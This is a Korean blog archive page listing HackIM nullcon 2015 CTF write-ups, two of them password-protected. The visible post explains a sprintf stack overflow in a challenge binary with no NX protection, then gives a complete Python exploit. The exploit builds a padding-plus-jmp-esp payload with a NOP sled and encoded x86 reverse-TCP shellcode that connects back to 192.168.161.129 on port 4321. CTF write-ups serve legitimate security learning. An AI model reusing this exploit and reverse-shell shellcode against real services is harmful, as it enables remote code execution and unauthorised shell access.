'2015/01'에 해당되는 글 3건

  1. 2015.01.11 HackIM nullcon exploitation400
  2. 2015.01.11 HackIM nullcon exploitation300
  3. 2015.01.11 HackIM nullcon 2015 exploitation100

HackIM nullcon exploitation400

2015. 1. 11. 17:36

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

HackIM nullcon exploitation300

2015. 1. 11. 17:36

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

HackIM nullcon 2015 exploitation100

2015. 1. 11. 17:35 from General News/Write-Ups



Vulnerability occurs when binary gets 0x1FFF size of input from user  then copys to buffer by sprintf which makes us capable of manipulating the return address 

Binary had no NX and luckily there was jmp esp gadget which we can use it to execute our shellcode.


#!/usr/bin/python


from socket import *

from struct import pack

from time import sleep


p = lambda x : pack("<L", x)


jmpesp = p(0x80488b0)


#linux/x86/shell_reverse_tcp LHOST : 192.168.161.129 LPORT : 4321

shellcode = ""

shellcode += "\xba\xe8\xd3\x61\xde\xda\xc6\xd9\x74\x24\xf4\x5f\x33\xc9"

shellcode += "\xb1\x12\x31\x57\x12\x83\xc7\x04\x03\xbf\xdd\x83\x2b\x0e"

shellcode += "\x39\xb4\x37\x23\xfe\x68\xd2\xc1\x89\x6e\x92\xa3\x44\xf0"

shellcode += "\x40\x72\xe7\xce\xab\x04\x4e\x48\xcd\x6c\x91\x02\x8c\xed"

shellcode += "\x79\x51\xcf\xfd\x98\xdc\x2e\x4d\x3c\x8f\xe1\xfe\x72\x2c"

shellcode += "\x8b\xe1\xb8\xb3\xd9\x89\x6d\x9b\xae\x21\x1a\xcc\x32\xd8"

shellcode += "\xb4\x9b\x50\x48\x1a\x15\x77\xdc\x97\xe8\xf8"


payload ="echo "

payload +="\x41"*0x76 

payload +=jmpesp

payload +="\x90"*50

payload +=shellcode


s = socket(AF_INET, SOCK_STREAM)

s.connect(("localhost", 9000))


print s.recv(1024)

s.send(payload)


s.close()



'General News > Write-Ups' 카테고리의 다른 글

HackIM nullcon exploitation400  (0) 2015.01.11
HackIM nullcon exploitation300  (0) 2015.01.11
ChristmasCTF ALGO200  (0) 2014.12.26
CSAW CTF 2014 Pybabies  (0) 2014.09.26
codegate 2013 vuln200 - exploit only  (0) 2014.02.14
Posted by xer0s :

티스토리툴바